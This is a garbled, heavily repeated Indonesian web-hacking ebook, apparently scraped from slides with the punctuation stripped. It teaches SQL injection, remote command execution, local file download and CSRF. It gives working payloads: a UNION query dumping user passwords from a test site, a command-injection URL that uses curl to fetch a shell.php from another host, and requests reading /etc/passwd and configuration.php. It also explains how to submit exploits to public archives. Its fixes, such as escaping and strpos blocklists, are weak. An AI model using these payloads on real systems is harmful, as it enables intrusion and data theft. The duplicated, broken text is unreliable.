Namun bukan hanya itu saja masih banyak yang dapat dilakukan melalui celah ini antaralain1 Membuat File2 Menghapus File3 Mengcopy File4 Mengedit File5 Melihat File etcpasswd
Dan masih banyak lagi
0x04 - Remote Code Execution
Menutup Celah Remote Code ExecutionUntuk menutup celah ini kita dapat menggunakan if switch case pada kode php
Pada kode diatas kita membatasi penggunaan perintah jadi hanya perintah yang telahkita tentukan saja yang dapat berfungsi seperti perintah netstat dan ifconfig
0x05 - Local File Download
Apa itu Local File DownloadLocal File Download merupakan sebuah teknik dimana seorang penyerang dapatmendownload file-file yang ada pada web target
0x05 - Local File Download
Kode yang Menimbulkan CelahLocal File Download dapat terjadi karena kesalahan dalam sebuah kode dan tidak ada filterdalam mendownload file
Contoh kode
Kode diatas akan mendownload file yang di input dari parameter file
Selain kode diatas ada juga kode yang menimbulkan celah seperti kode dibawah ini
Kode diatas akan mendownload file yang di input dari parameter downloadfile
0x05 - Local File Download
Injeksi Local File DownloadUntuk melakukan injeksi terhadap Local File Download kita hanya perlu memasukkannama file yang ingin di download
http127001filephpdownload=[File]
Contoh InjeksiJika kita ingin mendownload file configurationphp dari sebuah web
http127001filephpdownload=configurationphp
Namun kita bukan hanya bisa download file yang ada didalam web tetapi didalam serverjuga bisa
Contoh InjeksiJika kita ingin mendownload file etcpasswd untuk melihat users yang ada pada server
http127001filephpdownload=etcpasswd
0x05 - Local File Download
Menutup Celah Local File DownloadUntuk menutup celah Local File Download kita dapat menggunakan fungsi if strpos padakode php
Kode diatas akan membatasi atau filter kode injeksi seperti etcpasswd danconfigurationphp pada parameter file
0x06 - Cross Site Request Forgery
Apa itu Cross Site Request ForgeryCross Site Request Forgery merupakan teknik pemalsuan permintaan yang berasal darihalaman web atau situs yang berbeda Cross Site Request Forgery biasanya terjadi padahalaman admin sebuah web
0x06 - Cross Site Request Forgery
Kode yang Menimbulkan CelahCross Site Request Forgery dapat terjadi karena kesalahan dalam sebuah kode dan tidakadanya session dalam sebuah kode
Contoh Misalkan terjadi pada file administratorpostphp dan file tersebut berisi kode sepertidibawah ini
Kode diatas dapat melakukan penambahan data pada database Terlihat jelas bahwa userbiasa dapat menambahkan data jika user tersebut mengetahui parameter post karenatidak adanya sebuah session
0x06 - Cross Site Request Forgery
Injeksi Cross Site Request ForgeryUntuk melakukan injeksi terhadap Cross Site Request Forgery kita harus memasukankode injeksi dan membutuhkan sebuah kode dan mengetahui parameter pada web target
Kode Exploit Cross Site Request ForgeryPada celah ini kita membutuhkan sebuah kode untuk melakukan injeksi
Contoh Jika Cross Site Request Forgery terjadi pada httpgooglecomadministratorpostphpdan terdapat pada parameter post dan name
Berikut isi kode dari httpgooglecomadministratorpostphp
Jadi kita akan membuat sebuah kode yang melakukan penyerangan ke parameter postdan name
Berikut contoh kode
Kode tersebut akan menjadi seperti ini
Lalu tinggal melakukan submit pada data yang telah di input pada form text tersebut
0x06 - Cross Site Request Forgery
Menutup Celah Cross Site Request ForgeryUntuk menutup celah ini kita hanya perlu menambahkan session pada kode php
Contoh kode
Dari kode diatas kita menambahkan fungsi session_start() dan $_SESSION pada kodeKode tersebut berfungsi untuk melakukan pemeriksaan session Jika username bukanadmin maka posting gagal
0x07 - Mengarsipkan Exploit
Membuat Keterangan Exploit untuk DikirimSetelah kita selesai menganalisis kode dan menemukan sebuah celah (vulnerability) padasuatu Content Management System (CMS) kini saatnya kita membuat keteranganmengenai exploit kita untuk diarsipkan ke beberapa exploit archive seperti 1337dayExploit-DB dan Packet Storm Security
Dalam membuat exploit kita harus memberikan keterangan seperti Title Author DateFound Version Category Vendor Tested on Vulnerability dan POC
0x07 - Mengarsipkan ExploitMembuat Keterangan Exploit untuk Dikirim
Contoh Keterangan ExploitBerikut adalah contoh dalam membuat keterangan exploit
Dalam membuat keterangan exploit jangan lupa memberikan keterangan POC yangsangat jelas
0x07 - Mengarsipkan ExploitMengirim Exploit ke 1337dayUntuk mengirim exploit yang telah kita buat ke 1337day kita harus mengirimkan sebuahemail ke pihak 1337day1 admin1337daycom2 mrinj3ct0rgmailcom
0x07 - Mengarsipkan ExploitMengirim Exploit ke Exploit-DBUntuk mengirim exploit yang telah kita buat ke Exploit-DB kita harus mengirimkan sebuahemail ke pihak Exploit-DB1 submitoffseccom
0x07 - Mengarsipkan ExploitMengirim Exploit ke Packet Storm SecurityUntuk mengirim exploit yang telah kita buat ke Packet Storm Security kita harusmengirimkan sebuah email ke pihak Packet Storm Security1 submissionspacketstormsecuritycom
Demikian yang dapat penulis paparkan mengenai materi yang menjadi pokok bahasandalam ebook ini tentunya masih banyak kekurangan dan kelemahannya
Penulis banyak berharap para pembaca memberikan kritik dan saran yang membangunkepada penulis demi sempurnanya ebook ini dalam penulisan ebook di kesempatan-kesempatan berikutnya Semoga ebook ini berguna bagi para pembaca ebook ini
Terima kasih kepada
0x03 - SQL Injection
Injeksi SQL Injection
Melihat ColumnKita akan memasukkan query sql untuk melihat column yang adaDalam melihat column kita akan menggunakan query group_concat(column_name)dan+from+information_schemacolumns+where+table_name=CHAR(Table_Decimal)
Sebelum melihat column kita harus merubah nama tables dari string menjadi decimalPada kali ini penulis menggunakan tables usersString users gt Decimal 117115101114115
httptestphpvulnwebcomlistproductsphpcat=-1+union+select+123456group_concat(column_name)891011+from+information_schemacolumns+where+table_name=CHAR(117115101114115)--
Maka akan muncul column yang ada
Column 1 Uname 7 Phone2 Pass 8 Cart3 Cc4 Address5 Email6 Name
0x03 - SQL Injection
Injeksi SQL Injection
Melihat Data dari ColumnKita akan memasukkan query sql untuk melihat data pada column yang adaDalam melihat data column kita akan menggunakan group_concat(nama_column) dan+from+[nama_table]--
Pada kali ini kita akan melihat data pada tables users dan pada column uname amp passhttptestphpvulnwebcomlistproductsphpcat=-1+union+select+123456group_concat(uname0x3apass)891011+from+users--
Maka akan muncul data pada column tersebut
Data Column Uname testPass test
0x03 - SQL Injection
Menutup Celah SQL InjectionUntuk menutup celah ini kita dapat menggunakan fungsi mysql_real_escape_stringpada parameter untuk melakukan filterasi
Menambahkan fungsi mysql_real_escape_string pada parameter id
Dengan fungsi diatas kode injeksi seperti 1rsquo+order+by+1 akan diabaikan oleh query
0x04 - Remote Code Execution
Apa itu Remote Code ExecutionRemote Command Execution adalah sebuah celah yang membuat kita terhubung padasebuah command atau terminal sistem operasi server atau hosting web tersebut Dengancelah ini kita dapat menggunakan perintah-perintah yang ada pada sistem operasi servertersebut
0x04 - Remote Code Execution
Kode yang Menimbulkan CelahRemote Code Execution dapat terjadi karena kesalahan dalam sebuah kode dan tidakadanya filter terhadap kode injeksi yang berbahaya seperti wget curl cat dan lain-lainBerikut kode yang dapat menimbulkan celah ini
Kode diatas akan menjalankan perintah dan memunculkan output(hasil dari kerja perintah)dari parameter cmd
Namun selain kode diatas ada juga kode seperti ini yang dapat menimbulakan celah
Kode diatas akan menjalankan perintah atau mengeksekusi perintah tanpa mengeluarkanoutput dari parameter cmd namun perintah tetap berjalan atau dieksekusi
0x04 - Remote Code Execution
Injeksi Remote Code ExecutionUntuk melakukan injeksi terhadap Remote Code Execution kita harus memasukan kodeinjeksi atau perintah sistem operasi (operating system) pada parameter yang ada padacelah ini
http127001cmdphpcmd=[Perintah]
Pada celah ini kita dapat menggunakan perintah sistem operasi tetapi tergantung dariserver jika server menggunakan sistem operasi windows maka perintah yang digunakanadalah perintah di windows begitu juga dengan server yang menggunakan sistem operasilinux maka akan menggunakan perintah linux
Contoh perintah untuk download file dari server lain dan menyimpannya di web targethttp127001cmdphpcmd=curl -o httpgooglecomshellphp
Perintah diatas menggunakan cURL untuk download file dari server lain
Namun bukan hanya itu saja masih banyak yang dapat dilakukan melalui celah ini antaralain1 Membuat File2 Menghapus File3 Mengcopy File4 Mengedit File5 Melihat File etcpasswd
Dan masih banyak lagi
0x04 - Remote Code Execution
Menutup Celah Remote Code ExecutionUntuk menutup celah ini kita dapat menggunakan if switch case pada kode php
Pada kode diatas kita membatasi penggunaan perintah jadi hanya perintah yang telahkita tentukan saja yang dapat berfungsi seperti perintah netstat dan ifconfig
0x05 - Local File Download
Apa itu Local File DownloadLocal File Download merupakan sebuah teknik dimana seorang penyerang dapatmendownload file-file yang ada pada web target
0x05 - Local File Download
Kode yang Menimbulkan CelahLocal File Download dapat terjadi karena kesalahan dalam sebuah kode dan tidak ada filterdalam mendownload file
Contoh kode
Kode diatas akan mendownload file yang di input dari parameter file
Selain kode diatas ada juga kode yang menimbulkan celah seperti kode dibawah ini
Kode diatas akan mendownload file yang di input dari parameter downloadfile
0x05 - Local File Download
Injeksi Local File DownloadUntuk melakukan injeksi terhadap Local File Download kita hanya perlu memasukkannama file yang ingin di download
http127001filephpdownload=[File]
Contoh InjeksiJika kita ingin mendownload file configurationphp dari sebuah web
http127001filephpdownload=configurationphp
Namun kita bukan hanya bisa download file yang ada didalam web tetapi didalam serverjuga bisa
Contoh InjeksiJika kita ingin mendownload file etcpasswd untuk melihat users yang ada pada server
http127001filephpdownload=etcpasswd
0x05 - Local File Download
Menutup Celah Local File DownloadUntuk menutup celah Local File Download kita dapat menggunakan fungsi if strpos padakode php
Kode diatas akan membatasi atau filter kode injeksi seperti etcpasswd danconfigurationphp pada parameter file
0x06 - Cross Site Request Forgery
Apa itu Cross Site Request ForgeryCross Site Request Forgery merupakan teknik pemalsuan permintaan yang berasal darihalaman web atau situs yang berbeda Cross Site Request Forgery biasanya terjadi padahalaman admin sebuah web
0x06 - Cross Site Request Forgery
Kode yang Menimbulkan CelahCross Site Request Forgery dapat terjadi karena kesalahan dalam sebuah kode dan tidakadanya session dalam sebuah kode
Contoh Misalkan terjadi pada file administratorpostphp dan file tersebut berisi kode sepertidibawah ini
Kode diatas dapat melakukan penambahan data pada database Terlihat jelas bahwa userbiasa dapat menambahkan data jika user tersebut mengetahui parameter post karenatidak adanya sebuah session
0x06 - Cross Site Request Forgery
Injeksi Cross Site Request ForgeryUntuk melakukan injeksi terhadap Cross Site Request Forgery kita harus memasukankode injeksi dan membutuhkan sebuah kode dan mengetahui parameter pada web target
Kode Exploit Cross Site Request ForgeryPada celah ini kita membutuhkan sebuah kode untuk melakukan injeksi
Contoh Jika Cross Site Request Forgery terjadi pada httpgooglecomadministratorpostphpdan terdapat pada parameter post dan name
Berikut isi kode dari httpgooglecomadministratorpostphp
Jadi kita akan membuat sebuah kode yang melakukan penyerangan ke parameter postdan name
Berikut contoh kode
Kode tersebut akan menjadi seperti ini
Lalu tinggal melakukan submit pada data yang telah di input pada form text tersebut
0x06 - Cross Site Request Forgery
Menutup Celah Cross Site Request ForgeryUntuk menutup celah ini kita hanya perlu menambahkan session pada kode php
Contoh kode
Dari kode diatas kita menambahkan fungsi session_start() dan $_SESSION pada kodeKode tersebut berfungsi untuk melakukan pemeriksaan session Jika username bukanadmin maka posting gagal
0x07 - Mengarsipkan Exploit
Membuat Keterangan Exploit untuk DikirimSetelah kita selesai menganalisis kode dan menemukan sebuah celah (vulnerability) padasuatu Content Management System (CMS) kini saatnya kita membuat keteranganmengenai exploit kita untuk diarsipkan ke beberapa exploit archive seperti 1337dayExploit-DB dan Packet Storm Security
Dalam membuat exploit kita harus memberikan keterangan seperti Title Author DateFound Version Category Vendor Tested on Vulnerability dan POC
0x07 - Mengarsipkan ExploitMembuat Keterangan Exploit untuk Dikirim
Contoh Keterangan ExploitBerikut adalah contoh dalam membuat keterangan exploit
Dalam membuat keterangan exploit jangan lupa memberikan keterangan POC yangsangat jelas
0x07 - Mengarsipkan ExploitMengirim Exploit ke 1337dayUntuk mengirim exploit yang telah kita buat ke 1337day kita harus mengirimkan sebuahemail ke pihak 1337day1 admin1337daycom2 mrinj3ct0rgmailcom
0x07 - Mengarsipkan ExploitMengirim Exploit ke Exploit-DBUntuk mengirim exploit yang telah kita buat ke Exploit-DB kita harus mengirimkan sebuahemail ke pihak Exploit-DB1 submitoffseccom
0x07 - Mengarsipkan ExploitMengirim Exploit ke Packet Storm SecurityUntuk mengirim exploit yang telah kita buat ke Packet Storm Security kita harusmengirimkan sebuah email ke pihak Packet Storm Security1 submissionspacketstormsecuritycom
Demikian yang dapat penulis paparkan mengenai materi yang menjadi pokok bahasandalam ebook ini tentunya masih banyak kekurangan dan kelemahannya
Penulis banyak berharap para pembaca memberikan kritik dan saran yang membangunkepada penulis demi sempurnanya ebook ini dalam penulisan ebook di kesempatan-kesempatan berikutnya Semoga ebook ini berguna bagi para pembaca ebook ini
Terima kasih kepada
0x03 - SQL Injection
Injeksi SQL Injection
Melihat Data dari ColumnKita akan memasukkan query sql untuk melihat data pada column yang adaDalam melihat data column kita akan menggunakan group_concat(nama_column) dan+from+[nama_table]--
Pada kali ini kita akan melihat data pada tables users dan pada column uname amp passhttptestphpvulnwebcomlistproductsphpcat=-1+union+select+123456group_concat(uname0x3apass)891011+from+users--
Maka akan muncul data pada column tersebut
Data Column Uname testPass test
0x03 - SQL Injection
Menutup Celah SQL InjectionUntuk menutup celah ini kita dapat menggunakan fungsi mysql_real_escape_stringpada parameter untuk melakukan filterasi
Menambahkan fungsi mysql_real_escape_string pada parameter id
Dengan fungsi diatas kode injeksi seperti 1rsquo+order+by+1 akan diabaikan oleh query
0x04 - Remote Code Execution
Apa itu Remote Code ExecutionRemote Command Execution adalah sebuah celah yang membuat kita terhubung padasebuah command atau terminal sistem operasi server atau hosting web tersebut Dengancelah ini kita dapat menggunakan perintah-perintah yang ada pada sistem operasi servertersebut
0x04 - Remote Code Execution
Kode yang Menimbulkan CelahRemote Code Execution dapat terjadi karena kesalahan dalam sebuah kode dan tidakadanya filter terhadap kode injeksi yang berbahaya seperti wget curl cat dan lain-lainBerikut kode yang dapat menimbulkan celah ini
Kode diatas akan menjalankan perintah dan memunculkan output(hasil dari kerja perintah)dari parameter cmd
Namun selain kode diatas ada juga kode seperti ini yang dapat menimbulakan celah
Kode diatas akan menjalankan perintah atau mengeksekusi perintah tanpa mengeluarkanoutput dari parameter cmd namun perintah tetap berjalan atau dieksekusi
0x04 - Remote Code Execution
Injeksi Remote Code ExecutionUntuk melakukan injeksi terhadap Remote Code Execution kita harus memasukan kodeinjeksi atau perintah sistem operasi (operating system) pada parameter yang ada padacelah ini
http127001cmdphpcmd=[Perintah]
Pada celah ini kita dapat menggunakan perintah sistem operasi tetapi tergantung dariserver jika server menggunakan sistem operasi windows maka perintah yang digunakanadalah perintah di windows begitu juga dengan server yang menggunakan sistem operasilinux maka akan menggunakan perintah linux
Contoh perintah untuk download file dari server lain dan menyimpannya di web targethttp127001cmdphpcmd=curl -o httpgooglecomshellphp
Perintah diatas menggunakan cURL untuk download file dari server lain
Namun bukan hanya itu saja masih banyak yang dapat dilakukan melalui celah ini antaralain1 Membuat File2 Menghapus File3 Mengcopy File4 Mengedit File5 Melihat File etcpasswd
Dan masih banyak lagi
0x04 - Remote Code Execution
Menutup Celah Remote Code ExecutionUntuk menutup celah ini kita dapat menggunakan if switch case pada kode php
Pada kode diatas kita membatasi penggunaan perintah jadi hanya perintah yang telahkita tentukan saja yang dapat berfungsi seperti perintah netstat dan ifconfig
0x05 - Local File Download
Apa itu Local File DownloadLocal File Download merupakan sebuah teknik dimana seorang penyerang dapatmendownload file-file yang ada pada web target
0x05 - Local File Download
Kode yang Menimbulkan CelahLocal File Download dapat terjadi karena kesalahan dalam sebuah kode dan tidak ada filterdalam mendownload file
Contoh kode
Kode diatas akan mendownload file yang di input dari parameter file
Selain kode diatas ada juga kode yang menimbulkan celah seperti kode dibawah ini
Kode diatas akan mendownload file yang di input dari parameter downloadfile
0x05 - Local File Download
Injeksi Local File DownloadUntuk melakukan injeksi terhadap Local File Download kita hanya perlu memasukkannama file yang ingin di download
http127001filephpdownload=[File]
Contoh InjeksiJika kita ingin mendownload file configurationphp dari sebuah web
http127001filephpdownload=configurationphp
Namun kita bukan hanya bisa download file yang ada didalam web tetapi didalam serverjuga bisa
Contoh InjeksiJika kita ingin mendownload file etcpasswd untuk melihat users yang ada pada server
http127001filephpdownload=etcpasswd
0x05 - Local File Download
Menutup Celah Local File DownloadUntuk menutup celah Local File Download kita dapat menggunakan fungsi if strpos padakode php
Kode diatas akan membatasi atau filter kode injeksi seperti etcpasswd danconfigurationphp pada parameter file
0x06 - Cross Site Request Forgery
Apa itu Cross Site Request ForgeryCross Site Request Forgery merupakan teknik pemalsuan permintaan yang berasal darihalaman web atau situs yang berbeda Cross Site Request Forgery biasanya terjadi padahalaman admin sebuah web
0x06 - Cross Site Request Forgery
Kode yang Menimbulkan CelahCross Site Request Forgery dapat terjadi karena kesalahan dalam sebuah kode dan tidakadanya session dalam sebuah kode
Contoh Misalkan terjadi pada file administratorpostphp dan file tersebut berisi kode sepertidibawah ini
Kode diatas dapat melakukan penambahan data pada database Terlihat jelas bahwa userbiasa dapat menambahkan data jika user tersebut mengetahui parameter post karenatidak adanya sebuah session
0x06 - Cross Site Request Forgery
Injeksi Cross Site Request ForgeryUntuk melakukan injeksi terhadap Cross Site Request Forgery kita harus memasukankode injeksi dan membutuhkan sebuah kode dan mengetahui parameter pada web target
Kode Exploit Cross Site Request ForgeryPada celah ini kita membutuhkan sebuah kode untuk melakukan injeksi
Contoh Jika Cross Site Request Forgery terjadi pada httpgooglecomadministratorpostphpdan terdapat pada parameter post dan name
Berikut isi kode dari httpgooglecomadministratorpostphp
Jadi kita akan membuat sebuah kode yang melakukan penyerangan ke parameter postdan name
Berikut contoh kode
Kode tersebut akan menjadi seperti ini
Lalu tinggal melakukan submit pada data yang telah di input pada form text tersebut
0x06 - Cross Site Request Forgery
Menutup Celah Cross Site Request ForgeryUntuk menutup celah ini kita hanya perlu menambahkan session pada kode php
Contoh kode
Dari kode diatas kita menambahkan fungsi session_start() dan $_SESSION pada kodeKode tersebut berfungsi untuk melakukan pemeriksaan session Jika username bukanadmin maka posting gagal
0x07 - Mengarsipkan Exploit
Membuat Keterangan Exploit untuk DikirimSetelah kita selesai menganalisis kode dan menemukan sebuah celah (vulnerability) padasuatu Content Management System (CMS) kini saatnya kita membuat keteranganmengenai exploit kita untuk diarsipkan ke beberapa exploit archive seperti 1337dayExploit-DB dan Packet Storm Security
Dalam membuat exploit kita harus memberikan keterangan seperti Title Author DateFound Version Category Vendor Tested on Vulnerability dan POC
0x07 - Mengarsipkan ExploitMembuat Keterangan Exploit untuk Dikirim
Contoh Keterangan ExploitBerikut adalah contoh dalam membuat keterangan exploit
Dalam membuat keterangan exploit jangan lupa memberikan keterangan POC yangsangat jelas
0x07 - Mengarsipkan ExploitMengirim Exploit ke 1337dayUntuk mengirim exploit yang telah kita buat ke 1337day kita harus mengirimkan sebuahemail ke pihak 1337day1 admin1337daycom2 mrinj3ct0rgmailcom
0x07 - Mengarsipkan ExploitMengirim Exploit ke Exploit-DBUntuk mengirim exploit yang telah kita buat ke Exploit-DB kita harus mengirimkan sebuahemail ke pihak Exploit-DB1 submitoffseccom
0x07 - Mengarsipkan ExploitMengirim Exploit ke Packet Storm SecurityUntuk mengirim exploit yang telah kita buat ke Packet Storm Security kita harusmengirimkan sebuah email ke pihak Packet Storm Security1 submissionspacketstormsecuritycom
Demikian yang dapat penulis paparkan mengenai materi yang menjadi pokok bahasandalam ebook ini tentunya masih banyak kekurangan dan kelemahannya
Penulis banyak berharap para pembaca memberikan kritik dan saran yang membangunkepada penulis demi sempurnanya ebook ini dalam penulisan ebook di kesempatan-kesempatan berikutnya Semoga ebook ini berguna bagi para pembaca ebook ini
Terima kasih kepada
0x03 - SQL Injection
Menutup Celah SQL InjectionUntuk menutup celah ini kita dapat menggunakan fungsi mysql_real_escape_stringpada parameter untuk melakukan filterasi
Menambahkan fungsi mysql_real_escape_string pada parameter id
Dengan fungsi diatas kode injeksi seperti 1rsquo+order+by+1 akan diabaikan oleh query
0x04 - Remote Code Execution
Apa itu Remote Code ExecutionRemote Command Execution adalah sebuah celah yang membuat kita terhubung padasebuah command atau terminal sistem operasi server atau hosting web tersebut Dengancelah ini kita dapat menggunakan perintah-perintah yang ada pada sistem operasi servertersebut
0x04 - Remote Code Execution
Kode yang Menimbulkan CelahRemote Code Execution dapat terjadi karena kesalahan dalam sebuah kode dan tidakadanya filter terhadap kode injeksi yang berbahaya seperti wget curl cat dan lain-lainBerikut kode yang dapat menimbulkan celah ini
Kode diatas akan menjalankan perintah dan memunculkan output(hasil dari kerja perintah)dari parameter cmd
Namun selain kode diatas ada juga kode seperti ini yang dapat menimbulakan celah
Kode diatas akan menjalankan perintah atau mengeksekusi perintah tanpa mengeluarkanoutput dari parameter cmd namun perintah tetap berjalan atau dieksekusi
0x04 - Remote Code Execution
Injeksi Remote Code ExecutionUntuk melakukan injeksi terhadap Remote Code Execution kita harus memasukan kodeinjeksi atau perintah sistem operasi (operating system) pada parameter yang ada padacelah ini
http127001cmdphpcmd=[Perintah]
Pada celah ini kita dapat menggunakan perintah sistem operasi tetapi tergantung dariserver jika server menggunakan sistem operasi windows maka perintah yang digunakanadalah perintah di windows begitu juga dengan server yang menggunakan sistem operasilinux maka akan menggunakan perintah linux
Contoh perintah untuk download file dari server lain dan menyimpannya di web targethttp127001cmdphpcmd=curl -o httpgooglecomshellphp
Perintah diatas menggunakan cURL untuk download file dari server lain
Namun bukan hanya itu saja masih banyak yang dapat dilakukan melalui celah ini antaralain1 Membuat File2 Menghapus File3 Mengcopy File4 Mengedit File5 Melihat File etcpasswd
Dan masih banyak lagi
0x04 - Remote Code Execution
Menutup Celah Remote Code ExecutionUntuk menutup celah ini kita dapat menggunakan if switch case pada kode php
Pada kode diatas kita membatasi penggunaan perintah jadi hanya perintah yang telahkita tentukan saja yang dapat berfungsi seperti perintah netstat dan ifconfig
0x05 - Local File Download
Apa itu Local File DownloadLocal File Download merupakan sebuah teknik dimana seorang penyerang dapatmendownload file-file yang ada pada web target
0x05 - Local File Download
Kode yang Menimbulkan CelahLocal File Download dapat terjadi karena kesalahan dalam sebuah kode dan tidak ada filterdalam mendownload file
Contoh kode
Kode diatas akan mendownload file yang di input dari parameter file
Selain kode diatas ada juga kode yang menimbulkan celah seperti kode dibawah ini
Kode diatas akan mendownload file yang di input dari parameter downloadfile
0x05 - Local File Download
Injeksi Local File DownloadUntuk melakukan injeksi terhadap Local File Download kita hanya perlu memasukkannama file yang ingin di download
http127001filephpdownload=[File]
Contoh InjeksiJika kita ingin mendownload file configurationphp dari sebuah web
http127001filephpdownload=configurationphp
Namun kita bukan hanya bisa download file yang ada didalam web tetapi didalam serverjuga bisa
Contoh InjeksiJika kita ingin mendownload file etcpasswd untuk melihat users yang ada pada server
http127001filephpdownload=etcpasswd
0x05 - Local File Download
Menutup Celah Local File DownloadUntuk menutup celah Local File Download kita dapat menggunakan fungsi if strpos padakode php
Kode diatas akan membatasi atau filter kode injeksi seperti etcpasswd danconfigurationphp pada parameter file
0x06 - Cross Site Request Forgery
Apa itu Cross Site Request ForgeryCross Site Request Forgery merupakan teknik pemalsuan permintaan yang berasal darihalaman web atau situs yang berbeda Cross Site Request Forgery biasanya terjadi padahalaman admin sebuah web
0x06 - Cross Site Request Forgery
Kode yang Menimbulkan CelahCross Site Request Forgery dapat terjadi karena kesalahan dalam sebuah kode dan tidakadanya session dalam sebuah kode
Contoh Misalkan terjadi pada file administratorpostphp dan file tersebut berisi kode sepertidibawah ini
Kode diatas dapat melakukan penambahan data pada database Terlihat jelas bahwa userbiasa dapat menambahkan data jika user tersebut mengetahui parameter post karenatidak adanya sebuah session
0x06 - Cross Site Request Forgery
Injeksi Cross Site Request ForgeryUntuk melakukan injeksi terhadap Cross Site Request Forgery kita harus memasukankode injeksi dan membutuhkan sebuah kode dan mengetahui parameter pada web target
Kode Exploit Cross Site Request ForgeryPada celah ini kita membutuhkan sebuah kode untuk melakukan injeksi
Contoh Jika Cross Site Request Forgery terjadi pada httpgooglecomadministratorpostphpdan terdapat pada parameter post dan name
Berikut isi kode dari httpgooglecomadministratorpostphp
Jadi kita akan membuat sebuah kode yang melakukan penyerangan ke parameter postdan name
Berikut contoh kode
Kode tersebut akan menjadi seperti ini
Lalu tinggal melakukan submit pada data yang telah di input pada form text tersebut
0x06 - Cross Site Request Forgery
Menutup Celah Cross Site Request ForgeryUntuk menutup celah ini kita hanya perlu menambahkan session pada kode php
Contoh kode
Dari kode diatas kita menambahkan fungsi session_start() dan $_SESSION pada kodeKode tersebut berfungsi untuk melakukan pemeriksaan session Jika username bukanadmin maka posting gagal
0x07 - Mengarsipkan Exploit
Membuat Keterangan Exploit untuk DikirimSetelah kita selesai menganalisis kode dan menemukan sebuah celah (vulnerability) padasuatu Content Management System (CMS) kini saatnya kita membuat keteranganmengenai exploit kita untuk diarsipkan ke beberapa exploit archive seperti 1337dayExploit-DB dan Packet Storm Security
Dalam membuat exploit kita harus memberikan keterangan seperti Title Author DateFound Version Category Vendor Tested on Vulnerability dan POC
0x07 - Mengarsipkan ExploitMembuat Keterangan Exploit untuk Dikirim
Contoh Keterangan ExploitBerikut adalah contoh dalam membuat keterangan exploit
Dalam membuat keterangan exploit jangan lupa memberikan keterangan POC yangsangat jelas
0x07 - Mengarsipkan ExploitMengirim Exploit ke 1337dayUntuk mengirim exploit yang telah kita buat ke 1337day kita harus mengirimkan sebuahemail ke pihak 1337day1 admin1337daycom2 mrinj3ct0rgmailcom
0x07 - Mengarsipkan ExploitMengirim Exploit ke Exploit-DBUntuk mengirim exploit yang telah kita buat ke Exploit-DB kita harus mengirimkan sebuahemail ke pihak Exploit-DB1 submitoffseccom
0x07 - Mengarsipkan ExploitMengirim Exploit ke Packet Storm SecurityUntuk mengirim exploit yang telah kita buat ke Packet Storm Security kita harusmengirimkan sebuah email ke pihak Packet Storm Security1 submissionspacketstormsecuritycom
Demikian yang dapat penulis paparkan mengenai materi yang menjadi pokok bahasandalam ebook ini tentunya masih banyak kekurangan dan kelemahannya
Penulis banyak berharap para pembaca memberikan kritik dan saran yang membangunkepada penulis demi sempurnanya ebook ini dalam penulisan ebook di kesempatan-kesempatan berikutnya Semoga ebook ini berguna bagi para pembaca ebook ini
Terima kasih kepada
0x04 - Remote Code Execution
Apa itu Remote Code ExecutionRemote Command Execution adalah sebuah celah yang membuat kita terhubung padasebuah command atau terminal sistem operasi server atau hosting web tersebut Dengancelah ini kita dapat menggunakan perintah-perintah yang ada pada sistem operasi servertersebut
0x04 - Remote Code Execution
Kode yang Menimbulkan CelahRemote Code Execution dapat terjadi karena kesalahan dalam sebuah kode dan tidakadanya filter terhadap kode injeksi yang berbahaya seperti wget curl cat dan lain-lainBerikut kode yang dapat menimbulkan celah ini
Kode diatas akan menjalankan perintah dan memunculkan output(hasil dari kerja perintah)dari parameter cmd
Namun selain kode diatas ada juga kode seperti ini yang dapat menimbulakan celah
Kode diatas akan menjalankan perintah atau mengeksekusi perintah tanpa mengeluarkanoutput dari parameter cmd namun perintah tetap berjalan atau dieksekusi
0x04 - Remote Code Execution
Injeksi Remote Code ExecutionUntuk melakukan injeksi terhadap Remote Code Execution kita harus memasukan kodeinjeksi atau perintah sistem operasi (operating system) pada parameter yang ada padacelah ini
http127001cmdphpcmd=[Perintah]
Pada celah ini kita dapat menggunakan perintah sistem operasi tetapi tergantung dariserver jika server menggunakan sistem operasi windows maka perintah yang digunakanadalah perintah di windows begitu juga dengan server yang menggunakan sistem operasilinux maka akan menggunakan perintah linux
Contoh perintah untuk download file dari server lain dan menyimpannya di web targethttp127001cmdphpcmd=curl -o httpgooglecomshellphp
Perintah diatas menggunakan cURL untuk download file dari server lain
Namun bukan hanya itu saja masih banyak yang dapat dilakukan melalui celah ini antaralain1 Membuat File2 Menghapus File3 Mengcopy File4 Mengedit File5 Melihat File etcpasswd
Dan masih banyak lagi
0x04 - Remote Code Execution
Menutup Celah Remote Code ExecutionUntuk menutup celah ini kita dapat menggunakan if switch case pada kode php
Pada kode diatas kita membatasi penggunaan perintah jadi hanya perintah yang telahkita tentukan saja yang dapat berfungsi seperti perintah netstat dan ifconfig
0x05 - Local File Download
Apa itu Local File DownloadLocal File Download merupakan sebuah teknik dimana seorang penyerang dapatmendownload file-file yang ada pada web target
0x05 - Local File Download
Kode yang Menimbulkan CelahLocal File Download dapat terjadi karena kesalahan dalam sebuah kode dan tidak ada filterdalam mendownload file
Contoh kode
Kode diatas akan mendownload file yang di input dari parameter file
Selain kode diatas ada juga kode yang menimbulkan celah seperti kode dibawah ini
Kode diatas akan mendownload file yang di input dari parameter downloadfile
0x05 - Local File Download
Injeksi Local File DownloadUntuk melakukan injeksi terhadap Local File Download kita hanya perlu memasukkannama file yang ingin di download
http127001filephpdownload=[File]
Contoh InjeksiJika kita ingin mendownload file configurationphp dari sebuah web
http127001filephpdownload=configurationphp
Namun kita bukan hanya bisa download file yang ada didalam web tetapi didalam serverjuga bisa
Contoh InjeksiJika kita ingin mendownload file etcpasswd untuk melihat users yang ada pada server
http127001filephpdownload=etcpasswd
0x05 - Local File Download
Menutup Celah Local File DownloadUntuk menutup celah Local File Download kita dapat menggunakan fungsi if strpos padakode php
Kode diatas akan membatasi atau filter kode injeksi seperti etcpasswd danconfigurationphp pada parameter file
0x06 - Cross Site Request Forgery
Apa itu Cross Site Request ForgeryCross Site Request Forgery merupakan teknik pemalsuan permintaan yang berasal darihalaman web atau situs yang berbeda Cross Site Request Forgery biasanya terjadi padahalaman admin sebuah web
0x06 - Cross Site Request Forgery
Kode yang Menimbulkan CelahCross Site Request Forgery dapat terjadi karena kesalahan dalam sebuah kode dan tidakadanya session dalam sebuah kode
Contoh Misalkan terjadi pada file administratorpostphp dan file tersebut berisi kode sepertidibawah ini
Kode diatas dapat melakukan penambahan data pada database Terlihat jelas bahwa userbiasa dapat menambahkan data jika user tersebut mengetahui parameter post karenatidak adanya sebuah session
0x06 - Cross Site Request Forgery
